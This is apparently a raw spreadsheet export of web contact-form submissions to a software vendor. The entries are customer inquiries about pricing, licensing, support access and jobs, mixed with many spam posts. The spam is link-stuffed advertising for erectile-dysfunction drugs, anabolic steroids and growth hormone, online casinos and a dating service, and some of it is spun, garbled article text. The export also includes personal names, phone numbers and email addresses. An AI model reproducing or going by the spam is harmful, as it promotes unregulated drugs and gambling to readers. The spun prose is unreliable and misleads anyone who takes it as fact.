Scientists have long theorized that the early solar system once contained many more planets — some of which were likely little more than a mass of molten magma. One of these embryo planets — dubbed Theia — is believed to have slammed into a young Earth, ejecting a large amount of debris that later formed the moon. _x000D_
 _x000D_
"What we're claiming here," said Gillet, "is that we have in our hands a remnant of this first generation of planets that are missing today because they were destroyed or incorporated in a bigger planet." _x000D_
 _x000D_
Addi Bischoff, a meteorite expert at the University of Muenster, Germany, said the methods used for the study were sound and the conclusion was plausible. But further evidence of sustained high pressure would be expected to be found in the minerals surrounding the diamonds, he said. _x000D_
 _x000D_
Bischoff wasn't involved in the study, which was published in the jo</t>
  </si>
  <si>
    <t>I am looking for the CMS that can manage not only Web Content but also Digital Signage Content._x000D_
I was wondering if OpenText can cover both content about content authoring, content player, content management.</t>
  </si>
  <si>
    <t>Follow up on my application</t>
  </si>
  <si>
    <t>We need pricing details of product - Analytics Designer</t>
  </si>
  <si>
    <t>Partnership; Opportunity</t>
  </si>
  <si>
    <t xml:space="preserve">Je suis engagé, à titre bénévole, dans un projet de mise en valeur du fonds documentaire géré par la Fondation Arts et Métiers. _x000D_
Je suppose que vos applications pourraient supporter les fonctions envisagées. Je souhaite explorer une telle hypothèse en ayant une idée des conditions particulières qui pourraient être consenties. Une collaboration pour définir les bases d'une "application archives" d'intérêt général (et reproductible) pourrait s'envisager.   </t>
  </si>
  <si>
    <t xml:space="preserve">[url=http://www.bkcorretora.com.br/state/fold.asp?cc=208-Getropin-Fake-Getropin-For-Sale-Human-Growth-Hormone-Dosage]Getropin Fake[/url]_x000D_
 Move shades before you modify fishing lures. If you aren't catching anything, you may feel lured to change to an alternative appeal. This is certainly seldom the very best solution. Instead of changing from a attract which has been efficient previously, try out a various coloration of the same bait. This is certainly more prone to fix the problem than a new attract fully._x000D_
  [url=http://www.empatiltd.com/list/form.asp?tag=158-Generique-Cialis-En-Pharmacie-GÃ©nÃ©rique-Levitra-Levitra-20mg-Prix-En-Pharmacie]Generique Cialis En Pharmacie[/url]_x000D_
 Be sure to read through these design and style suggestions beneath if you want a hands._x000D_
  [url=http://www.rbrandao.net/cabecalho/editor.asp?f=89-Hygetropin-For-Sale-Uk-Getropin-Results-Igf-1-Lr3-Dose/]Hygetropin For Sale Uk[/url]_x000D_
 Maintain your epidermis, entire body, hair and fingernails or toenails hunting wonderful by eating a good, nicely-well-balanced diet plan. Supplying your body with all the nutrients and vitamins it deserves is an effective way to search your very best. So, keep in mind that elegance starts off with wholesome food choices although buying household goods._x000D_
  [url=http://www.zilmaraalencar.com.br/images/old.php?follow=210]ansomone hgh 2016[/url]_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">erectile ointment_x000D_
how to erectile dysfunction_x000D_
best erectile dysfunction remedies_x000D_
</t>
  </si>
  <si>
    <t>60s nyc everything from individuals that have there been_x000D_
_x000D_
interior Coen brothers online video media while in the Llewyn Davis, Oscar Isaac works a men and women musician rarely creating an income in Greenwich commune in the early 60s, owning the couches of the town center friends, most probably unaware of a singer away from Hibbing, Minn, Who just use location and will change the world but nearly to date._x000D_
_x000D_
The galaxy inhabited with Llewyn Davis who's freely based on the musician and performer [url=https://www.crunchbase.com/organization/latamdate-com]latamdate.com[/url] dave Van Ronk is truly a hermetic one, penned basically of a ordinary music purists for example him or her self, quite often branching seem to the ethnic cognoscenti of top of the rest of the world position. and yet the actual early 1960s parent site to chicago was except sular, state covering seemed to be in the midst of a great deal larger social ferment, some numerous subcultures around blues, art work, creep, shoot, theater coupled with journalism going through the seismic work days._x000D_
_x000D_
for a passing fancy twilight in san francisco in 1961, this is workable to assume joe Dylan, Barbra Streisand and kilometers Davis participating bars in and round the small town, long time Gloria Steinem and after that Robert Benton dealt broadsheets by visiting sean Downey s meal residential home uptown. james Earl Jones became featuring in Jean Genet s The whites from the St. dent s playhouse, despite the fact that edward Albee, choosing by then galvanized absent from Broadway with your indian future in addition Zoo details, was you can make that will s terrified of virginia Woolf? Stephen Sondheim has been noodling innovations to build a humorous occurrence established itself on route to the community. Andy Warhol has been considering Marilyn Diptych or 100 can lids in addition to other works well with the mans first destroy put artistic verify one year afterwards._x000D_
_x000D_
at some stage in a period any went abou</t>
  </si>
  <si>
    <t>To whom it may concern, I was interest in applying for the Lricing Manager as advertised in your career portal. Could you kindly let me know if that role has been fulfilled as it was advertised in January 2018. _x000D_
_x000D_
Regards.</t>
  </si>
  <si>
    <t>Enquiry. 10 Seat + 1 year maintenance fee. How does brava works? Do we need to establish a server for the 10 seats or is it a standalone application? How much do we need to pay and how is the payment done? (lumpsum/anually)</t>
  </si>
  <si>
    <t xml:space="preserve">hithere, I can't login to my  'Process Suite Developer Community' account and also I can't reset my password which comes with 'Update Password Failed' error message. Please help </t>
  </si>
  <si>
    <t xml:space="preserve">Good morning,_x000D_
_x000D_
I am hoping you can help to provide some information on your records management offerings. At Workplace Services Australia, we specialise in providing business solutions for various governmental and non-governmental organizations. We are currently investigating records management systems to potentially implement for our clients. Could you please provide me information on capabilities and pricing structure?_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
Cheers,_x000D_
_x000D_
Matthew P. Akers  _x000D_
Workplace Services_x000D_
_x000D_
t: 1300 972 202_x000D_
m: 0413 900 336_x000D_
e: matt@workplaceservicesaustralia.com.au _x000D_
53 Church Street, Camperdown NSW 2050_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Company is moving</t>
  </si>
  <si>
    <t xml:space="preserve">is erectile dysfunction hereditary_x000D_
erectile dysfunction icd 10_x000D_
living with erectile dysfunction_x000D_
</t>
  </si>
  <si>
    <t>irritation? My model 859 will show a notice of 'low voltage'-this but quickly returns. will disappear when I hit menu.  Started out as rare occurance but will run almost continually now- The unit does run but this is a PIA. Any ideas to make this go away without taking it 50 miles to complain to the installer? Thank you! bb</t>
  </si>
  <si>
    <t xml:space="preserve">My company would like to purchase the Brava reader. However, we are not able to go through the payment page. Paypal page keep showing "Please try again later"._x000D_
</t>
  </si>
  <si>
    <t>Hi,_x000D_
Would like to have a Opentext Edocs presentation for our office we need to implement a Document Management System we have see for the moment Wordox and eFile Cabinet. I used DM Humingbird for 18 years thats why i would like to show your eDOCS to our office were i work now. Cel 787-548-8567 _x000D_
Thanks in Advance</t>
  </si>
  <si>
    <t>Hello, we are a reseller/VAR. Our government customer Illinois Tollway is requesting a quote from us. Can someone please reach out and I will give you all the information. It will be for OpexText Rightfax Gateway Maintenance and Support. Thank you.</t>
  </si>
  <si>
    <t>Подарок руководителю, крупному бизнесмену, серьезному и ответственному человеку зрелого возраста должен быть солидным, запоминающимся, весомым, и недешевым, однозначно. Подробнее об этом читайте на сайте [url=http://fi-hi.ru]fi-hi.ru[/url]</t>
  </si>
  <si>
    <t>Upgrading</t>
  </si>
  <si>
    <t>Need to have contact information for our account rep for Fresenius Kabi</t>
  </si>
  <si>
    <t>I'm working for a client who has an RFP coming up for a CMS, implementation and customization. I'm looking for a contact email address for someone I can notify once the RFP is released. Please let me know!</t>
  </si>
  <si>
    <t>Need assistance to start Enterprise Scan for the first time. FYI I could not see scan feature enabled for me. After installing print/scan driver still Scan feature is not enabled for me hence I am not sure what is pending to start scanning using Imaging Enterprise Scan 10.5.0 so require your guidance</t>
  </si>
  <si>
    <t>I am a Certified Livelink Developer and I need to get a copy of my certificate. How can I do that?  My regular email is trevor@foursquarellc.com. Thx</t>
  </si>
  <si>
    <t>Unable to download purchased product</t>
  </si>
  <si>
    <t xml:space="preserve">Would like to update our user accounts. Currently the user that is listed as admin is no longer supporting us. He was part of the sap partner that implemented our system. I have a read only account and cannot submit support tickets or create an account for our new in house SAP business analyst. </t>
  </si>
  <si>
    <t>Here at Fluortek, we use VISUAL 7.0.0 for our ERP. To edit our reports, we had always used RepBi52, the Gupta Report Builder. As of now, I can no longer register this for our use. How can I get a PAK to run this software again, please?</t>
  </si>
  <si>
    <t xml:space="preserve">I would like my designated sales rep for Konica Minolta to contact me, please.  Thank you.  </t>
  </si>
  <si>
    <t>user of brava software</t>
  </si>
  <si>
    <t>i need an invoice</t>
  </si>
  <si>
    <t>can erectile dysfunction be corrected _x000D_
[url=http://erectiledysfunctionlq.com/]best drugs for ed[/url] _x000D_
youtube erectile dysfunction _x000D_
&lt;a href="http://erectiledysfunctionlq.com/"&gt;erectile dysfunction&lt;/a&gt;</t>
  </si>
  <si>
    <t>hello, I communicate with you for the following, the company where I work StreamServe, I understand that you bought StreamServe and I need to know how to get the latest version, know the advantages how it works and how you can acquire this software.</t>
  </si>
  <si>
    <t>Hi! I would like to inquire on a new account set-up. Can you please provide pricing information and any forms that are required for the new GXS Catalog Set-Up._x000D_
_x000D_
Thanks!</t>
  </si>
  <si>
    <t>online gambling casino _x000D_
[url=http://casino24list.com/]casino online[/url] _x000D_
&lt;a href="http://casino24list.com/"&gt;casino games real money&lt;/a&gt; _x000D_
slot online</t>
  </si>
  <si>
    <t xml:space="preserve">[url=http://www.rccaringcomm.org/wp-content/down.php?xia=Cheap-Trenbolone-For-Sale-Oxandrolone-Uk-Testosterone-Isocaproate-Uses-332/]Cheap Trenbolone For Sale[/url]_x000D_
 Following these pointers can help you to supply you with the system that you might want. This will result in a fantastic many benefits to suit your needs both mentally and physically. When you are able to have the amount of fitness that you simply constantly prepared on, you are going to feel as if an improved and a lot more total particular person.Incredible Advice To Stop Your Snoring And Obtain Some Sleeping_x000D_
  [url=http://www.creativehomeimprovementllc.com/wp-content/themes/mail.php?w=1567-Trenbolone-Base-Dosage-Oxandrolone-Uk-Testosterone-Isocaproate-Uses/]Trenbolone Base Dosage[/url]_x000D_
 If you wish to receive an training on a minimal budget, take into account seeing a community college for 2 many years well before transferring to an alternative educational institutions. You will find that community colleges are cheaper than other educational institutions and your credits will exchange providing you complete your general training just before relocating._x000D_
  [url=http://www.webyhostingbarato.com/wp-content/biller.php?wz=1520-Testosterone-Undecanoate-Injection-Dosage,Stanozolol-Side-Effects,Testosterone-Enanthate-Suppliers-Uk]Testosterone Undecanoate Injection Dosage[/url]_x000D_
 If you plan on producing an sophisticated meal for dinner, prepare a few components of the plate which can be refrigerated or left out the night time well before you need to make. This reduces pressure and mania in your kitchen to help you give attention to supplying your loved ones a meal worth the best possible five-celebrity dining places._x000D_
  [url=http://www.mandegar.asia/css/achieve.asp?once=598-Mesterolone-Reddit-Testosterone-Powder-India-Trenbolone-Cost-Uk/]Mesterolone Reddit[/url]_x000D_
</t>
  </si>
  <si>
    <t>I am unable to download my newly purchased software</t>
  </si>
  <si>
    <t>$441 10 seat network is per year or one-time purchase?</t>
  </si>
  <si>
    <t>casino online _x000D_
[url=http://casino24list.com/]online casino[/url] _x000D_
&lt;a href="http://casino24list.com/"&gt;casinos online&lt;/a&gt; _x000D_
casinos online</t>
  </si>
  <si>
    <t>online casino _x000D_
[url=http://casino24list.com/]online casino real money[/url] _x000D_
&lt;a href="http://casino24list.com/"&gt;cassino&lt;/a&gt; _x000D_
casinos online</t>
  </si>
  <si>
    <t>Hello,_x000D_
I have a couple of opportunities where 2 of my clients are looking to use an e Fax solution in Dublin Ireland._x000D_
I'd like to talk to someone about these opportunities._x000D_
Regards,_x000D_
Gavin</t>
  </si>
  <si>
    <t>Hello, _x000D_
 I am trying to reach someone that can assist with an employment verification on a former employee in the Pleasanton, CA . It s regarding CATHY JOANNE SZUKALSKI STORJOHANN. can you assist or direct me to the correct person?</t>
  </si>
  <si>
    <t>I am needing additional information about the sales tax billed on Actuate invoices: US-00064287 (dated 3/27/13) &amp; US-00064374 (dated 4/9/13).  The tax amounts are unusual and we cannot identify the jurisdiction(s) for which the sales tax was collected.  These invoices are included in a tax audit being conducted by the state of Florida.  Thanks in advance for your help.</t>
  </si>
  <si>
    <t xml:space="preserve">Hi,_x000D_
_x000D_
We're checking our compliance for GDPR (EU, UK ICO, Wikipedia) and have Hightail  as one of our data processors._x000D_
_x000D_
We'll be working through the ICO's checklist for contracts and documentation and will have some specific questions later but want to let you know that this is on our list to do._x000D_
_x000D_
If you have any documentation to cover your processing, or a DPA that we can review and sign then please would you send that over and this will help clarify later questions._x000D_
_x000D_
Kind Regards,_x000D_
_x000D_
Natalie_x000D_
_x000D_
-- _x000D_
Natalie White_x000D_
office manager, mahabis_x000D_
</t>
  </si>
  <si>
    <t>Sir . I would like apply for the post of Corporate and employment lawyer at Hyderabad India office. Kindly give to contact office address of Hyderabad telengana India</t>
  </si>
  <si>
    <t xml:space="preserve">Unable to log in </t>
  </si>
  <si>
    <t xml:space="preserve">Will Exceed 14 work on Windows 10?  </t>
  </si>
  <si>
    <t xml:space="preserve">[url=http://www.aveenamilk.com/img/green.asp?wws=145/]Cialis Prix Officiel[/url]_x000D_
 When undergoing with getting a coverage, make sure that you achieve this from a monetarily powerful and dependable business. It can be very important they have an "A" ranking from your leasing organization for instance a.M. Very best, Common &amp; Poor's, Duff &amp; Phelps, etc. You have to be sure that whomever you retain the services of can do the job proper and definately will not consider your money for the trip._x000D_
  [url=http://www.bestisland.ru/header/simple.php?ru=156-Ansomone-For-Sale-Buy-Hygetropin-Black-Tops-Hygetropin-Hgh-Results.html]Ansomone For Sale[/url]_x000D_
 Preserve energy, along with your hard-gained $ $ $ $, by only with your washing machine and dishwashing machine in case you have an entire stress. A compact stress utilizes just as much energy as being a full stress and does much less for that vitality expenditure. Permit laundry stack up an additional couple of days as a way to increase financial savings and efficiency. Also consider drying clothing outside on the clothesline if permitted in your town. The fresh outdoorsy scent can't be overcome, and you may show a substantial savings inside your application expenses when you cut back on your clothes dryer use._x000D_
  [url=http://www.zacelim.ru/Scripts/back.php?mu=239-Hgh-Fragment-176-191-Review-Riptropin-Real-Or-Fake-Igf-1-Hormone.html]Hgh Fragment 176-191 Review[/url]_x000D_
 Be aware of the chance in the stock exchange. In case you are employed to purchasing mutual resources, realize that individual supply shelling out is actually a greater risk. Should you aren't a person who seems to be ready to require a danger, stick with businesses that have a good fiscal standing, and that have revealed outstanding stock performance previously._x000D_
  [url=http://www.anppharma.in/themes/6/images.asp?division=138]Generika Cialis Erfahrungen[/url]_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">Hi, I am an independent consultant current looking for a solution on asset documentation management system for my client (petrochemical plant operator). I am interested to know more about your product Documentum and ApplicationXtender. Thanks </t>
  </si>
  <si>
    <t xml:space="preserve">[url=http://www.metroconbrasil.com.br/css/pear.php?o=826]Oxandrolone Australia[/url]_x000D_
 If you are like doing suicide or harming another person, it is essential that you seek aid quickly. They are signs that the major depression has brought uncontrollable and you will get help before it can be past too far. Usually do not be frightened to tell a specialist if you are feeling this way._x000D_
  [url=http://www.atlasmaden.com/language/zare.php?s=1128-Tadalafil-10mg-Supplier,Nandrolone-Cypionate,Testosterone-Booster-China]Tadalafil 10mg Supplier[/url]_x000D_
 Write from the source of consciousness. Documenting your thoughts on the topic since they spring to mind is the easiest method to make a sleek and flowing write-up. At this stage, usually do not take time to proofread or change, as you will only distract on your own from what it is you are trying to express._x000D_
  [url=http://www.restaurantemetropole.com.br/wp-content/assets.php?ml=1586-Trenbolone-Effects,Anavar-Oxandrolone-Tablets,Trenbolone-Enanthate-For-Sale-Uk.html]Trenbolone Effects[/url]_x000D_
 Usually do not be amazed if your local plumber expenses you a lot more than you expected. A lot of customers think that mending a toilet or any other discharge problem needs to be simple, therefore, the price should be low. You have to remember that not only does a plumber have to charge for labour, but they must demand for parts that you require._x000D_
  [url=http://www.2itechnet.com/screenshots/back.php?hot=1374]Testosterone Powder Amazon[/url]_x000D_
</t>
  </si>
  <si>
    <t>последние фильмы онлайн бесплатно [url=http://kinoset.online/film/15383]Кровь за кровь смотреть онлайн[/url]</t>
  </si>
  <si>
    <t>Would like to purchase Brava Desktop.  Need to discuss payment method._x000D_
_x000D_
Thank you</t>
  </si>
  <si>
    <t>Sehr geehrte Damen und Herren,_x000D_
_x000D_
Wir sind auf der Suche nach einer geeigneten Personalakte für unser Unternehmen und den internationalen Einsatz in 36 Ländern._x000D_
_x000D_
Rahmenbedingungen/Anforderungen:_x000D_
- Integration in SuccessFactors (inkl. Berechtigungen)_x000D_
- Globale Dokumentenablage_x000D_
- Dokumentenerzeugung (auch mit Barcode)_x000D_
- Dokumentenscanning_x000D_
_x000D_
Besten Dank für eine zeitnahe Konmtaktaufnahme._x000D_
_x000D_
Liebe Grüsse_x000D_
Stefan Weingärtner</t>
  </si>
  <si>
    <t xml:space="preserve">Dear OpenText:_x000D_
_x000D_
We can't access to My Support page with this account (mangestdoccreal@indra.es). We need it to create tickets and access the other tickets that we created in the past (when Documentum was managed by EMC / Dell). Don't understand why don't have privileges now. _x000D_
_x000D_
When we try to access to MySupport page, this message appears:_x000D_
_x000D_
"Our records indicate that you have registered for access to My Support but have not yet confirmed your email with us._x000D_
_x000D_
Please click on the link below to complete the process_x000D_
Request Confirmation Email"_x000D_
_x000D_
Then, we click on the link and receive a mail like this:_x000D_
_x000D_
..._x000D_
Registration Confirmation_x000D_
Dear Usuario Genérico MANGESTDOCCREAL, _x000D_
Congratulations! You now have access to the Online Support Resources available through My Support._x000D_
•	Your User ID: mangestdoccreal@indra.es_x000D_
•	Welcome and FAQ: ......_x000D_
..._x000D_
_x000D_
And then, when we try to access to the MySupport section via link we see the below message in the OpenText connect:_x000D_
_x000D_
"OpenText Connect_x000D_
No Access_x000D_
_x000D_
We're sorry, your account does not grant you access to this resource."_x000D_
_x000D_
Can you help us please?_x000D_
_x000D_
Best regards,_x000D_
Ciudad Real_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Bonjour,_x000D_
_x000D_
Nous souhaitons mettre en place un DAM hébergé sur nos serveurs. Pour ce faire, nous avons 4 exigences sur lesquelles nous ne pouvons déroger :_x000D_
1) Nous devons générer un fichier csv comportant les images maîtres d'une série de produits, avec les champs suivants (ref, liens fixes haute def. et_x000D_
basse def.)._x000D_
_x000D_
2) Génération d'un PNG transparent à partir d'un TIFF fond blanc avec tracé de détourage_x000D_
voici un lien avec un TIFF pour exemple : nous contacter car votre formulaire n'autorise pas les urls_x000D_
_x000D_
3) Possibilité de définir une image maître (car plusieurs vues d'un produit)_x000D_
_x000D_
4) Solution hébergée sur nos serveurs_x000D_
_x000D_
Merci pour votre réponse_x000D_
Cordialement_x000D_
 _x000D_
Philippe Poyssegu_x000D_
Responsable Communication Web / Webmaster</t>
  </si>
  <si>
    <t>We are looking for OpenText Dialog technologies training in India. Please confirm if you can support training in India. If yes, request to share the courses related to OpenText Dialog technologies.</t>
  </si>
  <si>
    <t>casino games _x000D_
[url=http://casino24list.com/]online casino[/url] _x000D_
&lt;a href="http://casino24list.com/"&gt;best online casino&lt;/a&gt; _x000D_
casino online</t>
  </si>
  <si>
    <t>We have a need to scan approximately 8000 PDF documents per months and extract certain information from these to be entered into a spreadsheet._x000D_
_x000D_
Our thought process at the moment is we may want to set up 20 'templates' of invoices from certain suppliers which will know where the information such as Invoice date, Invoice amount etc and enter this into separate Excel document with predefined fields._x000D_
_x000D_
Hopefully, I've explained this correctly, if not let me know._x000D_
_x000D_
Regards, Martin.</t>
  </si>
  <si>
    <t>Hi,_x000D_
_x000D_
Is there a version 16.0 of Xenos d2e Vision and Output Transformation Server?_x000D_
_x000D_
Many thanks,_x000D_
Joyce</t>
  </si>
  <si>
    <t>online casino slots _x000D_
[url=http://casino24list.com/]online casino gambling[/url] _x000D_
&lt;a href="http://casino24list.com/"&gt;slot online&lt;/a&gt; _x000D_
best online casino</t>
  </si>
  <si>
    <t>tibet realises better 'proof a' copulation Japan's WW2 slaves_x000D_
_x000D_
BEIJING (Reuters) offshore lawyers agreed on the thurs they unearthed newest proof women pressured to the office as wartime love-making slaves for japanese occupying troops, with the inclusion of years ago unpublished confessions a defense force implicated._x000D_
_x000D_
a new all of the china based online stores lawyers bureau, A navy pay per click group, created benefits of a study which often uncovered what they are called of 33 crooks and after that two chinese language program girls that known they appeared to be pressed to figure as women._x000D_
_x000D_
with regard to 1993, asia realized a situation factor throughout war time process and consequently apologised for any sufferers, who had been most commonly korean [url=https://www.bitchute.com/video/LI31gBjqgY9e/]Asiame scam[/url] and so far eastern, nevertheless angriness even can damage infiltrating in singapore and thus both Koreas._x000D_
_x000D_
tokyo, japan has declined paying direct a settlement to associated with the estimated 200,000 primarily wok cookware the women obligated to exert effort in its military services brothels forward along with while world war Two, announcing nearly all says was completed courtesy of - consequent calmness treaties._x000D_
_x000D_
the sex slavery celebration is a reminder of which wartime [url=https://asiamescam.wixsite.com/asiamescam]Asiame scam[/url] recollections remain efficient in india._x000D_
_x000D_
Kang Jian, on the list of legal representatives in the carpet the search, stated to Reuters that many despite the presence of scarves further enhancing between china based online shop and after that okazaki, japan, It had been critical to squeeze the women conditions for the recompense rather not to bury the case._x000D_
_x000D_
isn't any contradiction. dealing with the simple truth of the difficulty and worrying an apology to end concern can only recover relations within two peoples and ensure correct, lovely brings together in time, my girl shown._x000D_
_x000D_
Kang these among the</t>
  </si>
  <si>
    <t>Looking to buy a 10 seat network license for Brava Reader. Can you please confirm if the cost of the 10 seat network (TXL @ $1,035) is a one off cost or an annual subscription?_x000D_
_x000D_
Regards,_x000D_
_x000D_
Aaron</t>
  </si>
  <si>
    <t>I want know if there is already branch of vestige here in Philippines...and where it located if have?</t>
  </si>
  <si>
    <t xml:space="preserve">Hi,_x000D_
_x000D_
We are interested in Opentext software(ECM) and want to train our employees. Regarding this we need the following information from you._x000D_
_x000D_
- Where the training centers are near the KSA._x000D_
- How long it will take to get the full training._x000D_
- From where we can download the software for testing purpose._x000D_
_x000D_
Appreciate for your prompt reply._x000D_
_x000D_
Regards,_x000D_
Muhammad Sharjeel _x000D_
_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">Dear Sir/ Madam_x000D_
1.	NTRO is a Government of India Organisation and is currently in the process of     purchasing few items of which you are the OEM._x000D_
_x000D_
2.	M/s Foundation Futuristic Technologies (P) Ltd has approached us claiming that only they are authorised to directly bid/appoint local resellers for the project NTRO/CPC/015/2018 and is the role distributor of Guidance products in India. They have also enclosed a Manufacturer’s    Authorisation certificate issued by you on 9 April 2018._x000D_
_x000D_
_x000D_
3.	In this regard, you are kindly requested to confirm, if you have issued such authorisation certificate on 8 April 2018._x000D_
_x000D_
</t>
  </si>
  <si>
    <t>We are running SteamServe version 4.1.2 SP2 Build 1625 Unicode on a windows 2003 server and we would like to upgrade the server to a 2008 version._x000D_
Is this version of StreamServe supported on a Windows 2008 server?_x000D_
Is it safe to upgrade the server?_x000D_
Can we expect issues?</t>
  </si>
  <si>
    <t>Hi,_x000D_
_x000D_
Need pricing for documentum platform 501-1250=ua._x000D_
kindly contact me for more details._x000D_
Mir Faiz Ali</t>
  </si>
  <si>
    <t xml:space="preserve">It is appropriate time to make some plans for the future and it's time to be happy. I have read this post and if I could I desire to suggest you few interesting things or suggestions. Perhaps you can write next articles referring to this article. I wish to read more things about it!_x000D_
</t>
  </si>
  <si>
    <t>Cannot access document in link given by OpenText Consultant</t>
  </si>
  <si>
    <t>I am interested in the job as an account executive in Japan. I would like to know the detail of the job and how much I am fit for the requirements.</t>
  </si>
  <si>
    <t xml:space="preserve">[url=http://www.ebecnordic.eu/Scripts/mixule.asp?q=42]Levitra 20mg Price In Pakistan[/url]_x000D_
 Lots of people realize that inhaling strips are a powerful and relatively cost-effective way of reducing around the snoring loudly. Even so, many people have depicted issues with avoiding the strips from falling throughout the night. Before applying the strip, utilize an alcoholic drinks-structured toner to swab the nose and vicinity. This can permit the adhesive pieces to strongly grip your skin all night lengthy._x000D_
  [url=http://www.donadelli.ind.br/produtos/reduce.php?pa=Viagra-Deutschland-Rezeptfrei,Viagra-Germany,Viagra-GÃ¼nstig-94]Viagra Deutschland Rezeptfrei[/url]_x000D_
 If you are in critical credit debt and are trying to improve your credit history, remove all of your current charge cards other than a single. This allows you to enhance the procedure of paying your month to month expenses and helps prevent you against asking more on credit cards that currently have substantial balances._x000D_
  [url=http://www.marjack.com.br/form.php?idproduto=38]Levitra Bestellen Paypal[/url]_x000D_
 You have to be aware of your back again when twisting or kneeling. If you think any tugging, discomfort, or discomfort then cease quickly, as these feelings sign strain lying on your back. Should you stop right away, you may be capable minmize any upcoming possible problems and discomfort with the back again._x000D_
  [url=http://www.unclegeorge.com.tw/fonts/new.php?s=70-Kamagra-Rezeptfrei-Wien-Kamagra-Apotheke-Online-Kamagra-Wien]Kamagra Rezeptfrei Wien[/url]_x000D_
</t>
  </si>
  <si>
    <t>buy erectile</t>
  </si>
  <si>
    <t>casinos online _x000D_
[url=http://casino24list.com/]kasino[/url] _x000D_
&lt;a href="http://casino24list.com/"&gt;casino slots&lt;/a&gt; _x000D_
online casino real money</t>
  </si>
  <si>
    <t>play casino games online _x000D_
[url=http://casino24list.com/]casinos online[/url] _x000D_
&lt;a href="http://casino24list.com/"&gt;casino games slots&lt;/a&gt; _x000D_
kasino</t>
  </si>
  <si>
    <t>Hello,_x000D_
My Support page is still reporting "No Access" even after email verification._x000D_
Please advise._x000D_
_x000D_
_x000D_
Thanx &amp; Rgds,_x000D_
Shah</t>
  </si>
  <si>
    <t>Inquiry in transferring license to a new machine</t>
  </si>
  <si>
    <t>license transfer to another machine</t>
  </si>
  <si>
    <t xml:space="preserve">buying Brava license </t>
  </si>
  <si>
    <t xml:space="preserve">Want to talk to someone about an RFP for a client in Chicago.  </t>
  </si>
  <si>
    <t>We bought Finsol Vignette a while ago and need to reach out for some documentation as we are getting errors.</t>
  </si>
  <si>
    <t xml:space="preserve">We are currently trying to upgrade version 13 HostExplorer to version 15, but am unable to locate the right download. Can you please advise how this can be completed? Can you please assist? When I run the service packs they don't allow this to complete stating that "This machine is up to date.  Either the latest or newer patches have already been applied, or the patches are applicable to one or more products that are currently not installed on this machine."_x000D_
_x000D_
So do we install the service pack ontop of our current version to move from version 13 to 15, or is there a new install for version 15 that we can have and install?_x000D_
_x000D_
We're doing this so that our connection to FIS for Base Global is TSL1.2 compliant._x000D_
_x000D_
Regards,_x000D_
Chris_x000D_
</t>
  </si>
  <si>
    <t>erectile male enhancement _x000D_
[url=http://edpilsmystery.com/]buy erectile dysfunction pills[/url] _x000D_
erectile function after urethralplasty _x000D_
&lt;a href="http://edpilsmystery.com/"&gt;best erectile dysfunction pills&lt;/a&gt;</t>
  </si>
  <si>
    <t>Does OpenText Axcelerate connector support Documentum 16.4?</t>
  </si>
  <si>
    <t>Wondering if you can tell me which particular software product replaces Open Text Exceed X Server Win32 and if the replacement software is Windows 10 compatible?</t>
  </si>
  <si>
    <t>erectile vacuum pump demonstration _x000D_
[url=http://erectiledysfunctionlq.com/]best erectile dysfunction drug[/url] _x000D_
erectile disorder symptoms _x000D_
&lt;a href="http://erectiledysfunctionlq.com/"&gt;erectile dysfunction medications&lt;/a&gt;</t>
  </si>
  <si>
    <t>Hi_x000D_
_x000D_
I'm a solution architect support Genentech Commercial, Medical Affairs and Government Affairs Informatics.  I've been conducting a needs assessment evaluating business use cases in the OCR/ICR and ML space with the intent to make a technology recommendation for OCR/ICR implementations.    For our short list of vendors, we will conduct a POC to validate initiate findings and confirm the best vendor to support our business needs. In order to be considered for our shortlist, I need the following information.  Can you please answer the questions below and let me know if you have any clarifying questions.  Depending on the responses, we would potentially ask to set up a demo.  My colleague, Teri Benart, may have been in touch with you but given she recently left the organization I wanted to follow up and make sure we have the necessary information._x000D_
_x000D_
_x000D_
Regards,,_x000D_
Kathleen_x000D_
_x000D_
_x000D_
OCR/ICR Questions:_x000D_
_x000D_
_x000D_
_x000D_
What is the standard turn around time for conversion_x000D_
OCR/ICR must be able to process computer written and handwritten text_x000D_
Does the solution support semi-structured variable text (Contracts, Invoices, W-9 forms)_x000D_
What is the format(s) of the outbound conversion and how are these read?_x000D_
What is your % of accuracy of recognizing handwritten characters_x000D_
What is the processing time for large batches of forms_x000D_
What is your % of recognized characters_x000D_
Can your solution protect HIPAA and  PII data_x000D_
What is the exception handling process like for the solution and how are errors detected, routed and corrected_x000D_
Can your solution understand and read multiple choice fields_x000D_
Do you support multiple languages and if so which ones_x000D_
Is your software intuitive for the user and how easy is it to configure new forms/templates_x000D_
How do you authorize access and what is your authentication protocol_x000D_
Where are the images and documents stored_x000D_
How do you protect images/documents in transit_x000D_
How do you handle authentication of users_x000D_
Do you support API's to other systems - i.e. SAP, Salesf</t>
  </si>
  <si>
    <t>Buy Exceed 15 (1-4 user license) with media (software hard copy). Order Qty. 5</t>
  </si>
  <si>
    <t>Compatibility Matrix for TD Products related a IPv6 Compliant.</t>
  </si>
  <si>
    <t>I will be needing to work with the Documentum system very soon for my job with N3B, and would like to try a trial version to have experience before the system is deployed.</t>
  </si>
  <si>
    <t>Дорогие соотечественники скоро осталось до престоящего каникул в связи с этим вопрос кто куда подумывает поехать отдыхать? _x000D_
Подумываем с сестрой отправиться провести отпуск, кто где ищет [url=https://vk.com/otdyh_i_zhile_gelendzhik]жилье в геленджике[/url]? _x000D_
Боюсь что обманут сейчас столько воров страшно бронировать.</t>
  </si>
  <si>
    <t>A mutual client, Kimberly-Clark using your OpenText with SAP, input options?  They believe you only can use a document in PDF, I rather doubt that, and would love to learn more to better guide them.  Please have someone contact me ASAP, or send me information that I can have Kimberly-Clark reference to give them better clarity on your product.</t>
  </si>
  <si>
    <t>does erectile dysfunction go away _x000D_
[url=http://edpilsmystery.com/]erectile dysfunction[/url] _x000D_
best erectile dysfunction remedies _x000D_
&lt;a href="http://edpilsmystery.com/"&gt;solutions to erectile dysfunction&lt;/a&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">Many thanks for this article. I might also like to state that it can become hard when you are in school and simply starting out to establish a long credit history. There are many students who are simply trying to endure and have a good or favourable credit history are often a difficult thing to have._x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">Hello,_x000D_
_x000D_
